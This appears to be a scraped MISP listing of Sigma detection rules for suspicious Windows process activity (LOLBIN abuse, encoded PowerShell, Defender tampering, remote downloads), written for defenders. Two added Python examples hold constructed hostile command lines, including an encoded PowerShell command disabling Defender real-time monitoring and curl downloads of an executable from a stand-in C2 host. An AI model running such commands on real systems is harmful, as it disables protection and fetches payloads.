tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.008']

Local Groups Reconnaissance Via Wmic.EXE

Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Internal MISP references

UUID 164eda96-11b2-430b-85ff-6a265c15bf32 which can be used as unique global reference for Local Groups Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/12
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_group.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']

Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet

Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet

Internal MISP references

UUID c8a180d6-47a3-4345-a609-53f9c3d834fc which can be used as unique global reference for Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/10
falsepositive ['Administrative activity']
filename proc_creation_win_powershell_get_localgroup_member_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087.001']

Uncommon System Information Discovery Via Wmic.EXE

Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.

Internal MISP references

UUID 9d5a1274-922a-49d0-87f3-8c653483b909 which can be used as unique global reference for Uncommon System Information Discovery Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author TropChaud
creation_date 2023/01/26
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_system_info_uncommon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']

Remote File Download Via Findstr.EXE

Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.

Internal MISP references

UUID 587254ee-a24b-4335-b3cd-065c0f1f4baa which can be used as unique global reference for Remote File Download Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/05
falsepositive ['Unknown']
filename proc_creation_win_findstr_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1564.004', 'attack.t1552.001', 'attack.t1105']

Java Running with Remote Debugging

Detects a Java process running with remote debugging enabled in a way that allows more than just localhost to connect.

Internal MISP references

UUID 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710 which can be used as unique global reference for Java Running with Remote Debugging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_java_remote_debugging.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1203', 'attack.execution']

Python Spawning Pretty TTY on Windows

Detects Python spawning a pretty TTY.

Internal MISP references

UUID 480e7e51-e797-47e3-8d72-ebfce65b6d8d which can be used as unique global reference for Python Spawning Pretty TTY on Windows in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nextron Systems
creation_date 2022/06/03
falsepositive ['Unknown']
filename proc_creation_win_python_pty_spawn.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']

Replace.exe Usage

Detects the use of Replace.exe, which can be used to replace one file with another.

Internal MISP references

UUID 9292293b-8496-4715-9db6-37028dcda4b3 which can be used as unique global reference for Replace.exe Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/06
falsepositive ['Unknown']
filename proc_creation_win_lolbin_replace.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Disabled IE Security Features

Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features

Internal MISP references

UUID fb50eb7a-5ab1-43ae-bcc9-091818cb8424 which can be used as unique global reference for Disabled IE Security Features in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/06/19
falsepositive ['Unknown']
filename proc_creation_win_powershell_disable_ie_features.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Process Proxy Execution Via Squirrel.EXE

Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

Internal MISP references

UUID 45239e6a-b035-4aaf-b339-8ad379fcb67e which can be used as unique global reference for Process Proxy Execution Via Squirrel.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
creation_date 2022/06/09
falsepositive ['Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)']
filename proc_creation_win_squirrel_proxy_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']

Indirect Command Execution By Program Compatibility Wizard

Detects indirect command execution via the Program Compatibility Assistant binary pcwrun.exe.

Internal MISP references

UUID b97cd4b1-30b8-4a9d-bd72-6293928d52bc which can be used as unique global reference for Indirect Command Execution By Program Compatibility Wizard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author A. Sungurov , oscd.community
creation_date 2020/10/12
falsepositive ["Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", 'Legit usage of scripts']
filename proc_creation_win_lolbin_pcwrun.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.execution']

Tap Installer Execution

Detects installation of the well-known TAP virtual network adapter (tapinstall.exe, as shipped with OpenVPN), a possible preparation for data exfiltration over a tunnel.

Internal MISP references

UUID 99793437-3e16-439b-be0f-078782cf953d which can be used as unique global reference for Tap Installer Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, Ian Davis, oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate OpenVPN TAP installation']
filename proc_creation_win_tapinstall_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048']

Suspicious IIS Module Registration

Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors

Internal MISP references

UUID 043c4b8b-3a54-4780-9682-081cb6b8185c which can be used as unique global reference for Suspicious IIS Module Registration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Microsoft (idea)
creation_date 2022/08/04
falsepositive ['Administrative activity']
filename proc_creation_win_iis_susp_module_registration.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.004']

LOL-Binary Copied From System Directory

Detects a suspicious copy operation that copies a known LOLBIN from a system directory (System32, SysWOW64, WinSxS) to another location on disk in order to bypass detections that rely on the binary's location.

Internal MISP references

UUID f5d19838-41b5-476c-98d8-ba8af4929ee2 which can be used as unique global reference for LOL-Binary Copied From System Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/29
falsepositive ['Unknown']
filename proc_creation_win_susp_copy_system_dir_lolbin.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']

Potentially Suspicious Desktop Background Change Using Reg.EXE

Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

Internal MISP references

UUID 8cbc9475-8d05-4e27-9c32-df960716c701 which can be used as unique global reference for Potentially Suspicious Desktop Background Change Using Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Stephen Lincoln @slincoln-aiq (AttackIQ)
creation_date 2023/12/21
falsepositive ['Administrative scripts that change the desktop background to a company logo or other image.']
filename proc_creation_win_reg_desktop_background_change.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1112', 'attack.t1491.001']

Powershell Base64 Encoded MpPreference Cmdlet

Detects base64 encoded "MpPreference" PowerShell cmdlet code that attempts to modify or tamper with Windows Defender AV settings.

Internal MISP references

UUID c6fb44c6-71f5-49e6-9462-1425d328aee3 which can be used as unique global reference for Powershell Base64 Encoded MpPreference Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/04
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_mppreference.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

Parent in Public Folder Suspicious Process

Detects suspicious processes whose parent image is located in the C:\Users\Public folder.

Internal MISP references

UUID 69bd9b97-2be2-41b6-9816-fb08757a4d1a which can be used as unique global reference for Parent in Public Folder Suspicious Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/25
falsepositive ['Unknown']
filename proc_creation_win_susp_execution_from_public_folder_as_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1564', 'attack.t1059']

New Service Creation Using PowerShell

Detects the creation of a new service using powershell.

Internal MISP references

UUID c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 which can be used as unique global reference for New Service Creation Using PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
creation_date 2023/02/20
falsepositive ['Legitimate administrator or user creates a service for legitimate reasons.', 'Software installation']
filename proc_creation_win_powershell_create_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']

OpenWith.exe Executes Specified Binary

Detects OpenWith.exe being used to execute another binary.

Internal MISP references

UUID cec8e918-30f7-4e2d-9bfa-a59cc97ae60f which can be used as unique global reference for OpenWith.exe Executes Specified Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community (rule), @harr0ey (idea)
creation_date 2019/10/12
falsepositive ['Unknown']
filename proc_creation_win_lolbin_openwith.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Scheduled Task Executing Encoded Payload from Registry

Detects the creation of a scheduled task that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.

Internal MISP references

UUID c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 which can be used as unique global reference for Scheduled Task Executing Encoded Payload from Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/02/12
falsepositive ['Unlikely']
filename proc_creation_win_schtasks_reg_loader_encoded.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.t1059.001']

Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call

Detects base64 encoded and obfuscated variants of the "Load" keyword used with the .NET "Reflection.Assembly" class.
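
Both this rule and the "Powershell Base64 Encoded MpPreference Cmdlet" rule above match a keyword inside a -EncodedCommand blob without decoding it. That works because the payload is UTF-16LE and base64 groups bytes in threes: a keyword can only appear at three alignments, so three fixed substrings cover every position. The following is an added example, not the rules' own content: it derives those substrings, matches them against constructed command lines at all three alignments, and shows the failure mode (base64 preserves the attacker's casing, so "set-mppreference" slips past the fragments and only a decode-and-compare catches it). The keyword list is an assumption for the example.

```python
"""Added example (not the Sigma rules' code): build the base64 fragments that a
keyword produces at each of the three possible alignments of a UTF-16LE
-EncodedCommand payload, and match them against constructed command lines.
The keyword list is an assumption for this example."""
import base64
import re
from typing import List, Optional, Tuple

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the usual spellings.
_ENC_RE = re.compile(r"(?<!\S)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

DEFENDER_KEYWORDS = ("Set-MpPreference", "Add-MpPreference")


def base64_offset_variants(keyword: str, encoding: str = "utf-16-le") -> List[str]:
    """Three substrings, one per alignment of the keyword's first byte modulo 3.
    Padding bytes shift the alignment; the characters that depend on the padding
    (or on whatever follows the keyword) are cut off, so each substring appears
    verbatim in any base64 blob that contains the keyword at that alignment."""
    raw = keyword.encode(encoding)
    variants = []
    for pad in range(3):
        enc = base64.b64encode(b"\x00" * pad + raw).decode("ascii")
        start = (0, 2, 3)[pad]                      # chars tainted by the leading pad bytes
        end = (None, -3, -2)[(len(raw) + pad) % 3]  # chars tainted by the final partial group
        variants.append(enc[start:end])
    return variants


def encoded_payload_matches(cmdline: str, keywords=DEFENDER_KEYWORDS) -> List[Tuple[str, int]]:
    """Match without decoding, the way a Sigma rule on CommandLine must: returns
    (keyword, alignment) pairs whose fragment occurs in the encoded blob."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return []
    blob = m.group(1)
    hits = []
    for kw in keywords:
        for alignment, fragment in enumerate(base64_offset_variants(kw)):
            if fragment in blob:
                hits.append((kw, alignment))
                break
    return hits


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script for triage; None when the blob is not valid base64/UTF-16LE."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def decoded_matches(cmdline: str, keywords=DEFENDER_KEYWORDS) -> List[str]:
    """Case-insensitive match on the decoded script: catches 'set-mppreference', which
    the fragment match misses because base64 preserves the attacker's casing."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return []
    lowered = script.lower()
    return [kw for kw in keywords if kw.lower() in lowered]


def encode_command(script: str) -> str:
    """Produce the -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: the prefixes are 0, 8 and 10 bytes long in UTF-16LE, so the
# keyword lands at alignment 0, 2 and 1 respectively.
SAMPLE_SCRIPTS = [
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "cls;Set-MpPreference -DisableRealtimeMonitoring $true",
    "$x=1;Add-MpPreference -ExclusionPath C:\\Users\\Public",
    "set-mppreference -DisableRealtimeMonitoring $true",   # casing evasion
    "Get-Process | Out-Null",                               # benign
]
SAMPLE_EVENTS = ["powershell.exe -nop -w hidden -enc " + encode_command(s) for s in SAMPLE_SCRIPTS]

if __name__ == "__main__":
    for event, script in zip(SAMPLE_EVENTS, SAMPLE_SCRIPTS):
        print(encoded_payload_matches(event), decoded_matches(event), repr(script))
```

The practical consequence for rule authors: every casing of a cmdlet name that PowerShell accepts is a different byte sequence and therefore needs its own three fragments, which is why rules built this way enumerate the common spellings and why a decoding step in the pipeline is the more robust option where the log source allows it.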

Internal MISP references

UUID 9c0295ce-d60d-40bd-bd74-84673b7592b1 which can be used as unique global reference for Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/03/01
falsepositive ['Unlikely']
filename proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1059.001', 'attack.t1027']

Suspicious Schtasks From Env Var Folder

Detects scheduled task creations that point to a suspicious folder or to an environment variable often used by malware.

Internal MISP references

UUID 81325ce1-be01-4250-944f-b4789644556f which can be used as unique global reference for Suspicious Schtasks From Env Var Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/21
falsepositive ['Benign scheduled tasks creations or executions that happen often during software installations', 'Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders']
filename proc_creation_win_schtasks_env_folder.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']

Potential File Overwrite Via Sysinternals SDelete

Detects the use of SDelete to securely erase a specific file, as opposed to wiping free space.

Internal MISP references

UUID a4824fca-976f-4964-b334-0621379e84c4 which can be used as unique global reference for Potential File Overwrite Via Sysinternals SDelete in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/06/03
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_sdelete.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1485']

PowerShell Script Change Permission Via Set-Acl

Detects PowerShell execution to set the ACL of a file or a folder

Internal MISP references

UUID bdeb2cff-af74-4094-8426-724dc937f20a which can be used as unique global reference for PowerShell Script Change Permission Via Set-Acl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/18
falsepositive ['Unknown']
filename proc_creation_win_powershell_set_acl.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential LethalHTA Technique Execution

Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process

Internal MISP references

UUID ed5d72a6-f8f4-479d-ba79-02f6a80d7471 which can be used as unique global reference for Potential LethalHTA Technique Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2018/06/07
falsepositive ['Unknown']
filename proc_creation_win_mshta_lethalhta_technique.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.005']

Cloudflared Portable Execution

Detects the execution of the "cloudflared" binary from a non-standard location.

Internal MISP references

UUID fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd which can be used as unique global reference for Cloudflared Portable Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/20
falsepositive ['Legitimate usage of Cloudflared portable versions']
filename proc_creation_win_cloudflared_portable_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.001']

Remote Access Tool - LogMeIn Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID d85873ef-a0f8-4c48-a53a-6b621f11729d which can be used as unique global reference for Remote Access Tool - LogMeIn Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/11
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_logmein.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Visual Studio NodejsTools PressAnyKey Renamed Execution

Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries

Internal MISP references

UUID 65c3ca2c-525f-4ced-968e-246a713d164f which can be used as unique global reference for Visual Studio NodejsTools PressAnyKey Renamed Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2023/04/11
falsepositive ['Unknown']
filename proc_creation_win_renamed_pressanykey.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218']

Invoke-Obfuscation COMPRESS OBFUSCATION

Detects PowerShell obfuscated with the Invoke-Obfuscation COMPRESS technique.

Internal MISP references

UUID 7eedcc9d-9fdb-4d94-9c54-474e8affc0c7 which can be used as unique global reference for Invoke-Obfuscation COMPRESS OBFUSCATION in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_compress.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Insecure Proxy/DOH Transfer Via Curl.EXE

Detects execution of "curl.exe" with TLS certificate verification disabled for the proxy or DNS-over-HTTPS (DoH) leg of a transfer.
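
curl has separate switches for each TLS leg: -k/--insecure covers the target server, --proxy-insecure the HTTPS proxy and --doh-insecure the DoH resolver, and short switches can be clustered (-sSkL). The parser below is an added example, not the Sigma rule's own logic: it expands clusters and long options from a process-creation command line and reports which legs are unverified. The option tables cover only a subset of curl's options, the scoping of the rule to the proxy and DoH legs is an assumption, and the sample command lines are constructed.

```python
"""Added example (not the Sigma rule's code): expand curl's short-option clusters and
long options from a process-creation command line and report which TLS legs have
verification switched off. The option tables cover a subset of curl's options and
the sample command lines are constructed for this example."""
import re
from typing import Dict, List, Optional, Set, Tuple

# curl short options that consume a value (subset); 'x' is --proxy, 'o' is --output.
_SHORT_WITH_ARG = set("xoHduAebcTmwEFXy")
_SHORT_TO_LONG = {"k": "insecure", "x": "proxy", "o": "output", "s": "silent",
                  "S": "show-error", "L": "location", "H": "header", "d": "data",
                  "u": "user", "A": "user-agent", "X": "request"}
_LONG_WITH_ARG = {"proxy", "doh-url", "output", "header", "data", "user", "user-agent",
                  "request", "cacert", "proxy-cacert", "max-time", "connect-timeout", "url"}


def _tokens(cmdline: str) -> List[str]:
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def curl_options(cmdline: str) -> Optional[Tuple[Set[str], Dict[str, str]]]:
    """Return (flags, valued options) for the curl invocation in cmdline, with short
    clusters such as -sSkL expanded and -x/--proxy, --doh-url etc. paired with their
    values. None if curl is not the image."""
    toks = _tokens(cmdline)
    start = next((i for i, t in enumerate(toks)
                  if re.search(r"(?:^|\\)curl(?:\.exe)?$", t, re.I)), None)
    if start is None:
        return None
    flags, values = set(), {}
    i = start + 1
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("--"):
            name, has_eq, val = tok[2:].partition("=")
            name = name.lower()
            if name in _LONG_WITH_ARG:
                if not has_eq:                       # --proxy URL (value in the next token)
                    i += 1
                    val = toks[i] if i < len(toks) else ""
                values[name] = val
            else:
                flags.add(name)
        elif tok.startswith("-") and len(tok) > 1:
            cluster = tok[1:]
            for pos, ch in enumerate(cluster):
                name = _SHORT_TO_LONG.get(ch, ch)
                if ch in _SHORT_WITH_ARG:
                    val = cluster[pos + 1:]          # value may be glued on: -xhttp://proxy:8080
                    if not val:
                        i += 1
                        val = toks[i] if i < len(toks) else ""
                    values[name] = val
                    break                            # the value ends the cluster
                flags.add(name)
        i += 1
    return flags, values


def insecure_legs(cmdline: str) -> Optional[Set[str]]:
    """Which TLS connections the command line leaves unverified: 'proxy'
    (--proxy-insecure, only meaningful with an https:// proxy), 'doh' (--doh-insecure)
    and 'server' (-k/--insecure, the target URL itself)."""
    parsed = curl_options(cmdline)
    if parsed is None:
        return None
    flags, _ = parsed
    legs = set()
    if "proxy-insecure" in flags:
        legs.add("proxy")
    if "doh-insecure" in flags:
        legs.add("doh")
    if "insecure" in flags:
        legs.add("server")
    return legs


def matches_rule(cmdline: str) -> bool:
    """Assumed scope of the rule: verification disabled on the proxy or DoH leg.
    A plain -k against the target server is left to other rules."""
    legs = insecure_legs(cmdline)
    return bool(legs and legs & {"proxy", "doh"})


# Constructed sample events (CommandLine field of a process-creation log).
SAMPLE_EVENTS = [
    r'curl.exe --proxy https://proxy.corp.example:3128 --proxy-insecure https://files.example/p.zip -o p.zip',
    r'curl.exe --doh-url https://10.0.0.7/dns-query --doh-insecure -sSkL https://c2.example/x -o x.exe',
    r'curl.exe -sSkL https://dev.internal/build.zip -o build.zip',
    r'curl.exe -x http://proxy.corp.example:8080 https://www.example.com/ -o index.html',
    r'"C:\Windows\System32\curl.exe" --proxy-insecure -xhttps://proxy.example:443 https://example.com',
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print("ALERT" if matches_rule(event) else "ok   ", sorted(insecure_legs(event)), event)
```

When triaging a hit, pair the flag with the value it affects: --proxy-insecure only changes behaviour when the proxy URL captured under "proxy" uses https://, and --doh-insecure only when a --doh-url is set, so those two values are what decide whether a certificate check was actually bypassed.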

Internal MISP references

UUID 2c1486f5-02e8-4f86-9099-b97f2da4ed77 which can be used as unique global reference for Insecure Proxy/DOH Transfer Via Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Access to badly maintained internal or development systems']
filename proc_creation_win_curl_insecure_porxy_or_doh.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

MpiExec Lolbin

Detects a command line flag combination of mpiexec.exe, a LOLBIN shipped with Microsoft HPC Pack, that can be used to execute an arbitrary binary.

Internal MISP references

UUID 729ce0ea-5d8f-4769-9762-e35de441586d which can be used as unique global reference for MpiExec Lolbin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/11
falsepositive ['Unknown']
filename proc_creation_win_lolbin_mpiexec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218']

HackTool - F-Secure C3 Load by Rundll32

Detects rundll32 loading a DLL through its StartNodeRelay export; F-Secure C3 produces DLLs with that default exported function.

Internal MISP references

UUID b18c9d4c-fac9-4708-bd06-dd5bfacf200f which can be used as unique global reference for HackTool - F-Secure C3 Load by Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alfie Champion (ajpc500)
creation_date 2021/06/02
falsepositive ['Unknown']
filename proc_creation_win_hktl_c3_rundll32_pattern.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']

Potential Arbitrary DLL Load Using Winword

Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.

Internal MISP references

UUID f7375e28-5c14-432f-b8d1-1db26c832df3 which can be used as unique global reference for Potential Arbitrary DLL Load Using Winword in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_office_winword_dll_load.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']

Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE

Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe

Internal MISP references

UUID b6e04788-29e1-4557-bb14-77f761848ab8 which can be used as unique global reference for Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/23
falsepositive ['Unknown']
filename proc_creation_win_powershell_download_susp_file_sharing_domains.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Invoke-Obfuscation Obfuscated IEX Invocation

Detects all variations of the obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework.

Internal MISP references

UUID 4bf943c6-5146-4273-98dd-e958fd1e3abf which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Bohannon (@Mandiant/@FireEye), oscd.community
creation_date 2019/11/08
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Suspicious Registry Modification From ADS Via Regini.EXE

Detects regini.exe importing registry data from an alternate data stream (ADS); regini.exe can be used to modify registry keys.

Internal MISP references

UUID 77946e79-97f1-45a2-84b4-f37b5c0d8682 which can be used as unique global reference for Suspicious Registry Modification From ADS Via Regini.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Eli Salem, Sander Wiebing, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename proc_creation_win_regini_ads.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']

Potential Download/Upload Activity Using Type Command

Detects usage of the "type" command to download data from or upload data to a WebDAV server.

Internal MISP references

UUID aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f which can be used as unique global reference for Potential Download/Upload Activity Using Type Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/14
falsepositive ['Unknown']
filename proc_creation_win_lolbin_type.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Remotely Hosted HTA File Executed Via Mshta.EXE

Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file

Internal MISP references

UUID b98d0db6-511d-45de-ad02-e82a98729620 which can be used as unique global reference for Remotely Hosted HTA File Executed Via Mshta.EXE in MISP communities and other software using the MISP galaxy

